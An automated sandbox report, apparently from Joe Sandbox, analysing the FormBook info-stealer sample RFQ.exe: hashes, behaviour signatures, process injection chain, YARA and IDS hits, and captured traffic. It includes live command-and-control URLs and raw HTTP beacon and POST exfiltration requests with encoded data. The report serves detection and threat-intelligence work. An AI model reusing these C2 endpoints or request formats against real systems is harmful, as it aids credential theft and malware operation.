
Windows Analysis Report
RFQ.exe

Overview

General Information

Sample name: RFQ.exe
Analysis ID: 1551421
MD5: 85496e3bd4f547ed3ecb4bba94401773
SHA1: a59428a86cc0e1b04e05444a66a862dc872f24d1
SHA256: ca6e99cb086dcbdeaa2e6dcefd08a5907eb2f6b0cee11da6aef68818bbdaa72b
Tags: exe, user-lowmal3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for reading data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • RFQ.exe (PID: 6588 cmdline: "C:\Users\user\Desktop\RFQ.exe" MD5: 85496E3BD4F547ED3ECB4BBA94401773)
    • svchost.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\RFQ.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • rNgGAKxrFRkFYx.exe (PID: 5340 cmdline: "C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • net.exe (PID: 7600 cmdline: "C:\Windows\SysWOW64\net.exe" MD5: 31890A7DE89936F922D44D677F681A7F)
          • rNgGAKxrFRkFYx.exe (PID: 3872 cmdline: "C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7812 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches (memory dumps)
Source | Rule | Description | Author | Strings
0000000B.00000002.3128924724.00000000034F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.1512156269.0000000009040000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.3131106553.0000000004C10000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.1506663824.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.3129083519.0000000003650000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Yara matches (unpacked PE files)
Source | Rule | Description | Author | Strings
7.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
7.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\RFQ.exe", CommandLine: "C:\Users\user\Desktop\RFQ.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ.exe", ParentImage: C:\Users\user\Desktop\RFQ.exe, ParentProcessId: 6588, ParentProcessName: RFQ.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ.exe", ProcessId: 7324, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\RFQ.exe", CommandLine: "C:\Users\user\Desktop\RFQ.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ.exe", ParentImage: C:\Users\user\Desktop\RFQ.exe, ParentProcessId: 6588, ParentProcessName: RFQ.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ.exe", ProcessId: 7324, ProcessName: svchost.exe

Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-07T17:57:24.228610+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.7 | 49730 | TCP
2024-11-07T17:58:03.692339+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.7 | 49841 | TCP


                AV Detection

Source: http://www.4nk.education/gnvu/?7j=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FgkX779Cut1JrjhVNutQKYieetaE9VDmnk+XmhNaaOMMHcA19omccG+Ez&UvgPX=o0HdzhbpI6gx; Avira URL Cloud: Label: malware
Source: http://www.4nk.education/gnvu/; Avira URL Cloud: Label: malware
Source: http://www.corpseflowerwatch.org/yjfe/?7j=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZq285UIefAyWvRUTG1EMSSL8yxTXDHgut2ZldiYl/24i9u+qUtajOfEi&UvgPX=o0HdzhbpI6gx; Avira URL Cloud: Label: malware
Source: Yara match; File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000B.00000002.3128924724.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.1512156269.0000000009040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.3131106553.0000000004C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.1506663824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.3129083519.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.1507308924.00000000061A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.3121215291.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.3129016508.0000000005600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: RFQ.exe; Joe Sandbox ML: detected
Source: RFQ.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: net.pdbUGP; source: svchost.exe, 00000007.00000003.1469963468.000000000303B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469615717.000000000301A000.00000004.00000020.00020000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 00000009.00000002.3127273344.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb; source: rNgGAKxrFRkFYx.exe, 00000009.00000000.1356331320.0000000000A5E000.00000002.00000001.01000000.00000005.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3128393871.0000000000A5E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP; source: RFQ.exe, 00000001.00000003.1282585715.0000000004830000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000001.00000003.1280437204.0000000004690000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1329249007.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1327461526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1506943681.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1506943681.0000000003600000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000002.3129632807.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.1509162066.0000000003707000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000002.3129632807.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.1506988926.0000000003554000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb; source: RFQ.exe, 00000001.00000003.1282585715.0000000004830000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000001.00000003.1280437204.0000000004690000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.1329249007.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1327461526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1506943681.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1506943681.0000000003600000.00000040.00001000.00020000.00000000.sdmp, net.exe, net.exe, 0000000B.00000002.3129632807.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.1509162066.0000000003707000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000002.3129632807.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.1506988926.0000000003554000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb; source: net.exe, 0000000B.00000002.3130867153.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.3124155350.0000000003302000.00000004.00000020.00020000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000000.1576072994.00000000027DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1814266241.000000001418C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP; source: net.exe, 0000000B.00000002.3130867153.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.3124155350.0000000003302000.00000004.00000020.00020000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000000.1576072994.00000000027DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1814266241.000000001418C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: net.pdb; source: svchost.exe, 00000007.00000003.1469963468.000000000303B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469615717.000000000301A000.00000004.00000020.00020000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 00000009.00000002.3127273344.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\RFQ.exe; Code function: 1_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\RFQ.exe; Code function: 1_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\RFQ.exe; Code function: 1_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\RFQ.exe; Code function: 1_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\RFQ.exe; Code function: 1_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\RFQ.exe; Code function: 1_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\RFQ.exe; Code function: 1_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\RFQ.exe; Code function: 1_2_0045DE8F FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\RFQ.exe; Code function: 1_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\net.exe; Code function: 11_2_030BC820 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\net.exe; Code function: 11_2_030A9D30 4x nop then xor eax, eax
Source: C:\Windows\SysWOW64\net.exe; Code function: 11_2_037404E8 4x nop then mov ebx, 00000004h
Source: Joe Sandbox View; IP Address: 128.65.195.180
Source: Joe Sandbox View; IP Address: 199.59.243.227
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.7:49730
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.7:49841
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (11 occurrences)
Source: C:\Users\user\Desktop\RFQ.exe; Code function: 1_2_004422FE InternetQueryDataAvailable,InternetReadFile
Source: global traffic; HTTP traffic detected:
    GET /yjfe/?7j=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZq285UIefAyWvRUTG1EMSSL8yxTXDHgut2ZldiYl/24i9u+qUtajOfEi&UvgPX=o0HdzhbpI6gx HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.corpseflowerwatch.org
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected:
    GET /gnvu/?7j=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FgkX779Cut1JrjhVNutQKYieetaE9VDmnk+XmhNaaOMMHcA19omccG+Ez&UvgPX=o0HdzhbpI6gx HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.4nk.education
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected:
    GET /ym43/?UvgPX=o0HdzhbpI6gx&7j=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRQrtCTIFT6dG/tSbtJaoqKbhoy9A6auA9JhwvUMdjGZYE6oZ+fUFh6Re5 HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.migraine-massages.pro
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected:
    GET /d26j/?7j=yTdTvK6nwd7fLzOfAFK44iBGWUg6tisBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN2l5ObUVyEmhL88sORBUDBhEqT85THbs6ZR8PHSXuaXUURr4h8daA5RZo&UvgPX=o0HdzhbpI6gx HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.vnxoso88.art
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected:
    GET /afcr/?7j=pxUnB3/JQIgHT0Xru4WA6nCBQFxpXJgMoApNpkZ5FdrdhyTQr+Z8vQ44Z+GGNzyuoe7kishsw1Bs9wd8tp/8BBfqyAxJMs0BkbyFlX94FNsmynKB1TNzikOc40xRpv+r7CBu5ZxKJnGu&UvgPX=o0HdzhbpI6gx HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.pluribiz.life
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected:
    GET /1iqa/?7j=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQgVC25Yrin2Sqkv5Fwdk+dvafD+ucZYRStKeuK1fTd52HaDhfGqTyDFD4&UvgPX=o0HdzhbpI6gx HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.kdtzhb.top
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected:
    GET /293d/?7j=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGQY4I1bDlFW6+Qsk+eyldD4LupDRErgy15HSDrpN9gAoL/hEh+9gUTgMo&UvgPX=o0HdzhbpI6gx HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.evoo.website
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected:
    GET /vdvc/?7j=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczRfNZBZZEaN8IgdCZSECanEbYOAZ+JnzF5T5/sjPpe9MQhZicEiQ4HPQfz&UvgPX=o0HdzhbpI6gx HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.astorg-group.info
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected:
    GET /0m8a/?UvgPX=o0HdzhbpI6gx&7j=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo4fbiPNZTItUz1VN35oCbCkoE872J7CJYymsP5Px3u6hB+1hbmngRsUR HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.fiqsth.vip
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected:
    GET /ezyn/?7j=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMKN8+Alsd/uAlfqbny7J4c2YDLjDocbldGRQwWRw5cBSMls9XvUBQui7N&UvgPX=o0HdzhbpI6gx HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.bio-thymus.com
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; DNS traffic detected: DNS query: www.corpseflowerwatch.org
Source: global traffic; DNS traffic detected: DNS query: www.4nk.education
Source: global traffic; DNS traffic detected: DNS query: www.migraine-massages.pro
Source: global traffic; DNS traffic detected: DNS query: www.vnxoso88.art
Source: global traffic; DNS traffic detected: DNS query: www.pluribiz.life
Source: global traffic; DNS traffic detected: DNS query: www.kdtzhb.top
Source: global traffic; DNS traffic detected: DNS query: www.evoo.website
Source: global traffic; DNS traffic detected: DNS query: www.astorg-group.info
Source: global traffic; DNS traffic detected: DNS query: www.fiqsth.vip
Source: global traffic; DNS traffic detected: DNS query: www.bio-thymus.com
Source: global traffic; DNS traffic detected: DNS query: www.wukong.college
Source: unknown; HTTP traffic detected:
    POST /gnvu/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 215
    Cache-Control: max-age=0
    Connection: close
    Host: www.4nk.education
    Origin: http://www.4nk.education
    Referer: http://www.4nk.education/gnvu/
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
    Data Raw: 37 6a 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 62 75 37 53 42 4d 30 4a 54 37 32 62 56 78 47 36 39 37 31 46 2b 2f 4b 6d 62 59 2f 68 64 30 48 4b 37 73 53 6b 76 34 53 34 61 43 4c 48 30 5a 68 74 7a 6a 46 74 43 7a 4f 6c 72 57 68 71 42 73 76 41 53 31 46 4f 77 41 51 6f 73 57 37 61 37 49 47 35 6b 79 4a 53 39 48 55 74 6f 64 77 39 56 6a 50 51 68 2f 73 42 51 54 61 2b 37 50 2b 47 71 2f 76 39 45 75 77 68 63 47 64 4a 68 6b 49 63 4d 59 74 36 75 6e 30 79 37 57 58 45 6f 34 66 51 68 4f 44 56 54 51 73 75 54 46 4f 57 49 49 61 53 77 4e 6f 56 42 4e 62 42 77 6a 74 65 42 53 79 44 2b 72 4e 4d 62 36 4b 42 4d 57 62 45 35 2f 79 39 46 4c 55 57 38 46 62 32 38 77 3d 3d
    Data Ascii: 7j=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuTFOWIIaSwNoVBNbBwjteBSyD+rNMb6KBMWbE5/y9FLUW8Fb28w==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 07 Nov 2024 16:58:28 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 
00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
